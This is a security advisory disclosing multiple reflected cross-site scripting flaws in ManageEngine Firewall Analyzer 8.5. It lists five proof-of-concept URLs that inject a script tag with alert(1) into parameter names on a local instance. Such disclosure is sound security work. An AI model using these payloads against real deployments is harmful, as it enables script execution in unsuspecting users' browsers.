ManageEngine Firewall Analyzer 8.5 – Multiple Cross-Site Scripting Vulnerability

ManageEngine Firewall Analyzer 8.5 – Multiple Cross-Site Scripting Vulnerability

================================================================
ManageEngine Firewall Analyzer 8.5– Multiple Cross-Site Scripting Vulnerability
================================================================

Information
---------------------------------------------------------------------------------------------------------------------------------

Vulnerability Type : Multiple Cross Site Scripting Vulnerability
Vulnerable Version : 8.5
CVE-ID : 
Severity : High
Author – Sachin Wagh (@tiger_tigerboy)

Description 
---------------------------------------------------------------------------------------------------------------------------------
ManageEngine Firewall Analyzer is an agent less log analytics and configuration management software that helps network administrators to centrally collect,
archive, analyze their security device logs and generate forensic reports out of it.

ManageEngine Firewall Analyzer is prone to Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code 
in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL 
-----------------------------------------------------------------------------------------------------------------------------------

1. http://localhost:8500/ResolveDNSConfig.nms?f4efe"><script>alert(1)</script>2b1254aa403=1
2. http://localhost:8500/addDevCrd.nms?cba2d"><script>alert(1)</script>99328e18e3f=1
3. http://localhost:8500/customizeReportAction.nms?flushAll=true&17eab"><script>alert(1)</script>d1bf001d67b=1
4. http://localhost:8500/userIPConfig.nms?fe1b5"><script>alert(1)</script>62ff05628d3=1
5. http://localhost:8500/viewListPageAction.nms?3078c"><script>alert(1)</script>fea0d816dfe=1

Please find attached POC.

Affected Product:
-------------------------------------------------------------------------------------------------------------------------------------

Vulnerable Product:
                                [+]  ManageEngine Firewall Analyzer 8.5

Credits & Authors
-------------------------------------------------------------------------------------------------------------------------------------
Sachin Wagh (@tiger_tigerboy)


Thanks


        New to M365 Manager Plus?
        New to M365 Manager Plus?
          New to RecoveryManager Plus?
          New to RecoveryManager Plus?
            New to Exchange Reporter Plus?
            New to Exchange Reporter Plus?
              New to SharePoint Manager Plus?
              New to SharePoint Manager Plus?
                See all integrations
                New to ADManager Plus?

                  New to ADSelfService Plus?

                  Start your free trial





                            Related Products